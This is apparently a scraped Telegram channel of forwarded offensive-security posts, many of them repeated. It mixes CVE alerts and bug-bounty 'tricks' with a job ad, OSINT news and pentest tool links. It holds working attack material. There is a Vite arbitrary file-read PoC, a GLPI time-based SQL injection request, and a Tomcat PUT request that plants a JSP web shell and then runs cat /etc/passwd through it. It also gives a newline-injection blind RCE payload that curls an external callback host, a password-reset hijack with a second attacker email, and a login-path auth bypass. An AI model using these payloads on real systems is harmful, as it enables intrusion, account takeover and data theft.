SecList for CyberStudents
CVE-2025-30208 affects #Vite (prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, 4.5.10). When exposed to the network (--host flag), it allows arbitrary file read: /etc/passwdor C:\Windows\win.ini by appending ?raw?? or ?import&raw??. PoC: https://1.2.3.4/etc/passwd?raw??…
https://github.com/keklick1337/CVE-2025-30208-ViteVulnScanner
https://github.com/sumeet-darekar/CVE-2025-30208
https://github.com/sumeet-darekar/CVE-2025-30208
GitHub
GitHub - keklick1337/CVE-2025-30208-ViteVulnScanner: CVE-2025-30208 ViteVulnScanner
CVE-2025-30208 ViteVulnScanner. Contribute to keklick1337/CVE-2025-30208-ViteVulnScanner development by creating an account on GitHub.
Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks. It is used to manage and organize computers, users, and resources within a network. AD provides authentication and authorization services, allowing administrators to control access to network resources efficiently.
Key Components of Active Directory:
1. Domain Controller (DC) – A server that stores AD data and handles authentication.
2. Organizational Units (OUs) – Logical containers for organizing users, groups, and computers.
3. Groups & Users – Define permissions and access control.
4. Group Policy (GPO) – Used to enforce security settings and configurations.
5. Forest & Domains – A hierarchical structure that organizes multiple AD domains.
Key Components of Active Directory:
1. Domain Controller (DC) – A server that stores AD data and handles authentication.
2. Organizational Units (OUs) – Logical containers for organizing users, groups, and computers.
3. Groups & Users – Define permissions and access control.
4. Group Policy (GPO) – Used to enforce security settings and configurations.
5. Forest & Domains – A hierarchical structure that organizes multiple AD domains.
👍1🔥1
Образование и опыт:
Опыт работы 2–5 лет в сфере сетевой безопасности.
Глубокие знания сетевых протоколов и технологий (BGP, OSPF, VLAN, IPsec).
Навыки и знания:
Администрирование и настройка SIEM-систем (Splunk, QRadar).
Опыт работы с WAF, DLP, PAM, IAM.
Работа с NGFW (Next-Gen Firewall) и межсетевыми экранами (FortiGate, Palo Alto, Cisco ASA).
Анализ уязвимостей и тестирование на проникновение (pentest).
Опыт работы с Linux/Windows на продвинутом уровне.
Желательные сертификаты:
Cisco CCNP Security
Fortinet NSE 4-7
@sherzodubaydullaev
Yoki Junior Network Engineer bo'lsa ham bo'ladi
Опыт работы 2–5 лет в сфере сетевой безопасности.
Глубокие знания сетевых протоколов и технологий (BGP, OSPF, VLAN, IPsec).
Навыки и знания:
Администрирование и настройка SIEM-систем (Splunk, QRadar).
Опыт работы с WAF, DLP, PAM, IAM.
Работа с NGFW (Next-Gen Firewall) и межсетевыми экранами (FortiGate, Palo Alto, Cisco ASA).
Анализ уязвимостей и тестирование на проникновение (pentest).
Опыт работы с Linux/Windows на продвинутом уровне.
Желательные сертификаты:
Cisco CCNP Security
Fortinet NSE 4-7
@sherzodubaydullaev
Yoki Junior Network Engineer bo'lsa ham bo'ladi
Forwarded from OSINT
Индия начала зачистку OSINT-платформ
#OSINT #News
Власти Индии объявили охоту на OSINT-сервисы, которые занимаются сбором и продажей утечек, взломанных баз и даркнет-данных. В официальном заявлении отмечается, что подобные действия нарушают законы о персональных данных и представляют угрозу национальной безопасности.
⚠️ Под удар попали платформы, работающие с leaked data, dark web и hack dumps — теперь правоохранители и спецслужбы займутся их блокировкой и уголовным преследованием.
🔗 Подробнее: The420.in
LH | Новости | Курсы | OSINT
#OSINT #News
Власти Индии объявили охоту на OSINT-сервисы, которые занимаются сбором и продажей утечек, взломанных баз и даркнет-данных. В официальном заявлении отмечается, что подобные действия нарушают законы о персональных данных и представляют угрозу национальной безопасности.
LH | Новости | Курсы | OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
POC: https://github.com/MuhammadWaseem29/CVE-2025-24799/tree/main
Pre-Auth SQL Injection
CVE-2025-24799
Severity : Critical
#CVE
Pre-Auth SQL Injection
CVE-2025-24799
Severity : Critical
#CVE
👍1
Forwarded from Brut Security (Emon Shaikh)
🔥Never forget to check for blind RCE!💥
I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:
;id | whoami & uname
But... firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE — still blocked.
Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?
Payload idea: Inject a newline before the actual payload:
attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun
(Use %0a for newline — URL encoded)
And boom — Blind RCE triggered! My server got the hit instantly.
Cybersecurity isn’t about effort — it’s about mindset. Deep thinking always wins over brute force.❤️
I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:
;id | whoami & uname
But... firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE — still blocked.
Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?
Payload idea: Inject a newline before the actual payload:
attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun
(Use %0a for newline — URL encoded)
And boom — Blind RCE triggered! My server got the hit instantly.
Cybersecurity isn’t about effort — it’s about mindset. Deep thinking always wins over brute force.❤️
Password Reset Bypass Trick 🌀
Some poorly secured endpoints accept multiple email parameters.😳
Try this:
POST /passwordReset HTTP/1.1
Content-Type: application/x-www-form-urlencoded
[email protected]&[email protected]
Or in JSON:
{
"email": ["[email protected]", "[email protected]"]
}
If the app sends the reset link to both emails… you’re in.⚡
Now imagine if the victim is an admin — hello dashboard, hello bounty!💰
#bugbountytips
Some poorly secured endpoints accept multiple email parameters.😳
Try this:
POST /passwordReset HTTP/1.1
Content-Type: application/x-www-form-urlencoded
[email protected]&[email protected]
Or in JSON:
{
"email": ["[email protected]", "[email protected]"]
}
If the app sends the reset link to both emails… you’re in.⚡
Now imagine if the victim is an admin — hello dashboard, hello bounty!💰
#bugbountytips
🔥You can find💥
Broken access control to idor vulnerability:
using this simple tricks (effective for .net webapps and sometimes work in php based webapps)🧐😎
target.com/hidden this page required authentication or redirect to /login page.
Try: target.com/login/hidden
OMG! Auth bypass ✅
Broken access control to idor vulnerability:
using this simple tricks (effective for .net webapps and sometimes work in php based webapps)🧐😎
target.com/hidden this page required authentication or redirect to /login page.
Try: target.com/login/hidden
OMG! Auth bypass ✅
👏1
Apache Tomcat: Potential RCE
Severity : Critical
CVE-2025-24813
POC: https://github.com/MuhammadWaseem29/CVE-2025-24813
#CVE
Severity : Critical
CVE-2025-24813
POC: https://github.com/MuhammadWaseem29/CVE-2025-24813
#CVE
🚨 Снова #GLPI - Критическая уязвимость SQL-инъекции без аутентификации через /index.php/ajax/ CVE-2025-24799 и CVE-2025-24801
Позволяет удалённому атакующему выполнять произвольные SQL-запросы и потенциально эскалировать до RCE.
🛠️ Затрагивает версии до 10.0.18
✅ Исправлено в версии GLPI 10.0.18
🔍 PoC:
🧪 SQLi-сканер:
👉 https://github.com/MuhammadWaseem29/CVE-2025-24799/tree/main
📚 Подробности и пост-эксплуатация до RCE:
👉 https://blog.lexfo.fr/glpi-sql-to-rce.html
‼️ Если используете GLPI — обновитесь немедленно и проверьте логи на предмет активности на /ajax/.
#CVE
Позволяет удалённому атакующему выполнять произвольные SQL-запросы и потенциально эскалировать до RCE.
🛠️ Затрагивает версии до 10.0.18
✅ Исправлено в версии GLPI 10.0.18
🔍 PoC:
POST /index.php/ajax/ HTTP/1.1
Host: glpi
User-Agent: python-requests/2.32.3
Content-Type: application/xml
Content-Length: 232
<?xml version="1.0" encoding="UTF-8"?>
<xml>
<QUERY>get_params</QUERY>
<deviceid>', IF((1=1),(select sleep(5)),1), 0, 0, 0, 0, 0, 0);#</deviceid>
<content>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</content>
</xml>
🧪 SQLi-сканер:
👉 https://github.com/MuhammadWaseem29/CVE-2025-24799/tree/main
📚 Подробности и пост-эксплуатация до RCE:
👉 https://blog.lexfo.fr/glpi-sql-to-rce.html
‼️ Если используете GLPI — обновитесь немедленно и проверьте логи на предмет активности на /ajax/.
#CVE
👍1
Forwarded from SecuriXy.kz
🔥 Path Equivalence в Apache Tomcat CVE-2025-24813
Критическая RCE-уязвимость из-за некорректной обработки ../ в PUT-запросах.
💥 Уязвимые версии:
Tomcat 11.0.0-M1 – 11.0.2
Tomcat 10.1.0-M1 – 10.1.34
Tomcat 9.0.0.M1 – 9.0.98
📌 Исправлено в: 11.0.3, 10.1.35, 9.0.99
🧨 Эксплуатация возможна при включённой записи через default servlet (по умолчанию выключено) и использовании partial PUT (включено по умолчанию).
📦 PoC:
📥 Доступ к вебшеллу:
📚 Подробнее: 👉 https://github.com/advisories/GHSA-83qj-6fr2-vhqg
‼️ EPSS: 93.5% — высокая вероятность эксплуатации в реальных атаках.
⛔ Обновляйте Tomcat или блокируйте PUT на уровне веб-сервера, если не используется.
Критическая RCE-уязвимость из-за некорректной обработки ../ в PUT-запросах.
💥 Уязвимые версии:
Tomcat 11.0.0-M1 – 11.0.2
Tomcat 10.1.0-M1 – 10.1.34
Tomcat 9.0.0.M1 – 9.0.98
📌 Исправлено в: 11.0.3, 10.1.35, 9.0.99
🧨 Эксплуатация возможна при включённой записи через default servlet (по умолчанию выключено) и использовании partial PUT (включено по умолчанию).
📦 PoC:
curl -X PUT "https://target.com/uploads/../webapps/ROOT/updates.jsp" \
-H "Content-Type: application/x-jsp" \
--data-raw '<%@ page import="java.io.*" %>
<html><body>
<form method="GET"><input type="text" name="cmd"><input type="submit" value="Run"></form>
<% if(request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String l; while((l=r.readLine())!=null){ out.println(l+"<br>"); } } %>
</body></html>' -i
📥 Доступ к вебшеллу:
curl "https://target.com/updates.jsp?cmd=cat/etc/passwd" -i
📚 Подробнее: 👉 https://github.com/advisories/GHSA-83qj-6fr2-vhqg
‼️ EPSS: 93.5% — высокая вероятность эксплуатации в реальных атаках.
⛔ Обновляйте Tomcat или блокируйте PUT на уровне веб-сервера, если не используется.
Forwarded from SecuriXy.kz
💣 pgAdmin RCE CVE-2025-2945 -
Удалённое выполнение кода (RCE) в одном из самых популярных GUI-интерфейсов для PostgreSQL.
Актуально для всех версий pgAdmin ≤ 9.1
🧠 Уязвимость кроется в eval() - опасной функции, интерпретирующей строки как исполняемый код.
🎯 Уязвимые endpoints:
📌 Условия эксплуатации:
Нужна аутентификация
POST-запросы к указанным маршрутам
📉 Потенциал:
Полный захват сервера, выполнение произвольных команд, возможность lateral movement внутри инфраструктуры.
🔗 Подробнее: 👉 https://py0zz1.tistory.com/entry/Remote-Code-Execution-Vulnerability-in-pgAdmin-CVE-2025-2945
https://www.youtube.com/watch?v=V2WzCmRct7s
Удалённое выполнение кода (RCE) в одном из самых популярных GUI-интерфейсов для PostgreSQL.
Актуально для всех версий pgAdmin ≤ 9.1
🧠 Уязвимость кроется в eval() - опасной функции, интерпретирующей строки как исполняемый код.
🎯 Уязвимые endpoints:
/sqleditor/query_tool/download/<int:trans_id>
/cloud/deploy
📌 Условия эксплуатации:
Нужна аутентификация
POST-запросы к указанным маршрутам
📉 Потенциал:
Полный захват сервера, выполнение произвольных команд, возможность lateral movement внутри инфраструктуры.
🔗 Подробнее: 👉 https://py0zz1.tistory.com/entry/Remote-Code-Execution-Vulnerability-in-pgAdmin-CVE-2025-2945
https://www.youtube.com/watch?v=V2WzCmRct7s
👍1
Forwarded from Codeby
go install -v github.com/projectdiscovery/mapcidr/cmd/mapcidr@latest.Генерация списка IP-адресов для заданного CIDR или диапазона IP:
mapcidr -cidr 192.168.0.0/24
echo "192.168.0.0-192.168.0.5" | mapcidr
Разделение заданного CIDR на подсети по заданному количеству CIDR(-sbc 10):
mapcidr -cidr 173.0.84.0/24 -sbc 10 -silent
Разделение заданного CIDR на подсети по по количеству хостов в каждой из них(-sbh 20000):
mapcidr -cidr 173.0.84.0/16 -sbh 20000 -silent
Идеальное разделение возможно только в том случае, если желаемое количество сегментов или хостов в подсети является степенью двойки. В противном случае инструмент попытается автоматически найти наилучшую стратегию разделения для достижения желаемого результата.
Представление заданного IP-адреса в десяти поддерживаемых уникальных форматах
echo 192.168.1.154 | mapcidr -if 0 -silent
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Suggested tools for performing AWS penetration testing
https://github.com/aws/aws-cli
https://docs.aws.amazon.com/cli/latest/reference/#cli-aws
https://github.com/prowler-cloud/prowler
https://github.com/NetSPI/aws_consoler
https://github.com/zer1t0/awsenum
https://github.com/andresriancho/enumerate-iam
https://github.com/nccgroup/ScoutSuite
https://github.com/carnal0wnage/weirdAAL
https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting
#AWS #Tools #Pentest
https://github.com/aws/aws-cli
https://docs.aws.amazon.com/cli/latest/reference/#cli-aws
https://github.com/prowler-cloud/prowler
https://github.com/NetSPI/aws_consoler
https://github.com/zer1t0/awsenum
https://github.com/andresriancho/enumerate-iam
https://github.com/nccgroup/ScoutSuite
https://github.com/carnal0wnage/weirdAAL
https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting
#AWS #Tools #Pentest
GitHub
GitHub - aws/aws-cli: Universal Command Line Interface for Amazon Web Services
Universal Command Line Interface for Amazon Web Services - aws/aws-cli